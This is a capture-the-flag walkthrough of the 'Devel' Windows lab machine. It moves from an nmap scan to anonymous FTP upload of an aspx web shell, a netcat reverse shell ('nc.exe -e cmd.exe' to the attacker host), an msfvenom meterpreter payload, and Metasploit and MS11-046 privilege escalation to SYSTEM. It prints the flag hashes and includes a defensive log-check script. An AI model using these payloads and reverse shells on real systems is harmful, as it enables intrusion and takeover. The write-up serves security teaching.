Preface
Information Gathering
nmap -sC -sV -oA intense 10.129.152.23
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-27 19:04 UTC
Nmap scan report for 10.129.152.23
Host is up (0.069s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.73 seconds
ftp 10.129.152.23
Connected to 10.129.152.23.
220 Microsoft FTP Service
Name (10.129.118.104:root): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17 05:37PM 689 iisstart.htm
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete
ftp 10.129.152.23
Connected to 10.129.152.23.
220 Microsoft FTP Service
Name (10.129.152.23:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put testh4x.txt
local: testh4x.txt remote: testh4x.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
32 bytes sent in 0.00 secs (1.0523 MB/s)
Exploitation (without Metasploit)
ftp 10.129.152.23
Connected to 10.129.152.23.
220 Microsoft FTP Service
Name (10.129.152.23:root): anonymous
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put cmd.aspx
local: cmd.aspx remote: cmd.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (31.2545 MB/s)
sudo python smbserver.py share h4xploit/
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
nc -lnvp 443
Listening on 0.0.0.0 443
\\10.10.14.61\share\nc.exe -e cmd.exe 10.10.14.61 443
Connection received on 10.129.152.23 49159
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
iis apppool\web

c:\windows\system32\inetsrv>cd ../../..

c:\>cd Users

c:\Users>cd babis
cd babis
Access is denied.

c:\Users>
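The foothold above depends on a single misconfiguration: the anonymous FTP account can write into the IIS webroot, so any uploaded .aspx is served as code. The following detection check is an added example, not part of the original writeup; it assumes the default W3C log format of the Microsoft FTP service and runs over constructed sample log lines that mirror the uploads shown in this section.

```python
from pathlib import Path

# Constructed sample of Microsoft FTP Service W3C log lines (not taken from the page);
# the column order is given by the #Fields header, as IIS FTP 7.5 writes it.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status
2021-05-28 12:20:01 10.10.14.61 anonymous 10.129.152.23 21 USER anonymous 331 0
2021-05-28 12:20:01 10.10.14.61 anonymous 10.129.152.23 21 PASS *** 230 0
2021-05-28 12:20:05 10.10.14.61 anonymous 10.129.152.23 21 STOR testh4x.txt 226 0
2021-05-28 12:30:10 10.10.14.61 anonymous 10.129.152.23 21 STOR cmd.aspx 226 0
2021-05-28 12:41:00 10.10.14.61 anonymous 10.129.152.23 21 STOR h4xplo1t.aspx 226 0
2021-05-28 12:41:30 10.10.14.61 anonymous 10.129.152.23 21 STOR blocked.aspx 550 5
2021-05-28 13:00:00 192.168.1.5 deploy 10.129.152.23 21 STOR release.aspx 226 0
"""

# Extensions IIS hands to a script or native handler: a write of one of these
# into the webroot turns a file upload into code execution on the server.
EXECUTABLE_EXT = {".aspx", ".asp", ".ashx", ".asmx", ".asax", ".config", ".cshtml", ".exe", ".dll"}
ANON_USERS = {"anonymous", "ftp"}

def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_anonymous_script_uploads(text):
    """Return (timestamp, client_ip, filename) for every STOR by an anonymous
    user of an executable file that the server accepted (226 = transfer complete)."""
    hits = []
    for rec in parse_w3c(text):
        name = rec.get("cs-uri-stem", "")
        if (rec.get("cs-method") == "STOR"
                and rec.get("cs-username", "").lower() in ANON_USERS
                and Path(name).suffix.lower() in EXECUTABLE_EXT
                and rec.get("sc-status") == "226"):
            hits.append((rec["date"] + " " + rec["time"], rec["c-ip"], name))
    return hits

if __name__ == "__main__":
    for when, src, fname in find_anonymous_script_uploads(SAMPLE_LOG):
        print(f"{when} anonymous upload of {fname} from {src}")
```

On the sample the check flags cmd.aspx and h4xplo1t.aspx only: the text file, the rejected upload (550) and the authenticated deploy account are ignored.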
Exploitation (with Metasploit)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.61 LPORT=4444 -f aspx > h4xplo1t.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2884 bytes
ftp 10.129.152.23
Connected to 10.129.152.23.
220 Microsoft FTP Service
Name (10.129.152.23:root): anonymous
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put h4xplo1t.aspx
local: h4xplo1t.aspx remote: h4xplo1t.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2921 bytes sent in 0.00 secs (30.9520 MB/s)
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
msf6 exploit(multi/handler) > set LHOST 10.10.14.61
LHOST => 10.10.14.61
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.61:4444
[*] Meterpreter session 1 opened (10.10.14.61:4444 -> 10.129.152.23:49164) at 2021-05-28 12:41:14 +0000
meterpreter > sysinfo
Computer : DEVEL
OS : Windows 7 (6.1 Build 7600).
Architecture : x86
System Language : el_GR
Domain : HTB
Logged On Users : 0
Meterpreter : x86/windows
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.129.152.23 - Collecting local exploits for x86/windows...
[*] 10.129.152.23 - 37 exploit checks are being tried...
[+] 10.129.152.23 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.129.152.23 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.129.152.23 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.129.152.23 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.129.152.23 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.152.23 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.152.23 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.129.152.23 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.129.152.23 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.129.152.23 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.129.152.23 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.129.152.23 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.129.152.23 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf6 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 2
SESSION => 2
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.61
LHOST => 10.10.14.61
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.61:4444
[*] Launching notepad to host the exploit...
[+] Process 3204 launched.
[*] Reflectively injecting the exploit DLL into 3204...
[*] Injecting exploit into 3204 ...
[*] Exploit injected. Injecting payload into 3204...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.129.152.23
[*] Meterpreter session 3 opened (10.10.14.61:4444 -> 10.129.152.23:49165) at 2021-05-28 12:51:59 +0000
meterpreter > shell
Process 3484 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\system

c:\windows\system32\inetsrv>
Privilege Escalation
c:\Windows\Microsoft.NET\Framework>\\10.10.14.61\share\Watson.exe
\\10.10.14.61\share\Watson.exe
 [*] OS Build number: 7600
 [*] CPU Address Width: 32
 [*] Process IntPtr Size: 4
 [*] Using Windows path: C:\WINDOWS\System32

  [*] Appears vulnerable to MS10-073
   [>] Description: Kernel-mode drivers load unspecified keyboard layers improperly, which result in arbitrary code execution in the kernel.
   [>] Exploit: https://www.exploit-db.com/exploits/36327/
   [>] Notes: None.

  [*] Appears vulnerable to MS10-092
   [>] Description: When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
   [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms10_092_schelevator.rb
   [>] Notes: None.

  [*] Appears vulnerable to MS11-046
   [>] Description: The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input, which allows local users to elevate privileges.
   [>] Exploit: https://www.exploit-db.com/exploits/40564/
   [>] Notes: None.

  [*] Appears vulnerable to MS12-042
   [>] Description: An EoP exists due to the way the Windows User Mode Scheduler handles system requests, which can be exploited to execute arbitrary code in kernel mode.
   [>] Exploit: https://www.exploit-db.com/exploits/20861/
   [>] Notes: None.

  [*] Appears vulnerable to MS13-005
   [>] Description: Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation.
   [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
   [>] Notes: None.

  [*] Finished. Found 5 vulns :)
c:\Users>\\10.10.14.61\share\MS11-046.exe

c:\Windows\System32>whoami
whoami
nt authority\system

c:\Windows\System32>
User:
c:\>cd Users/babis/Desktop

c:\Users\babis\Desktop>type user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8

c:\Users\babis\Desktop>
Root:
c:\Users>cd Administrator/Desktop

c:\Users\Administrator\Desktop>type root.txt
e621a0b5041708797c4fc4728bc72b4b

c:\Users\Administrator\Desktop>
END
This article first appeared on the WeChat official account SecTr Security Team (SecTr安全团队): A Devel Target Machine Penetration Test Walkthrough
Disclaimer: The programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes no legal or joint liability. If you have any questions, contact us by e-mail (we recommend a corporate or other valid mailbox so that the message is not blocked; contact details are on the home page).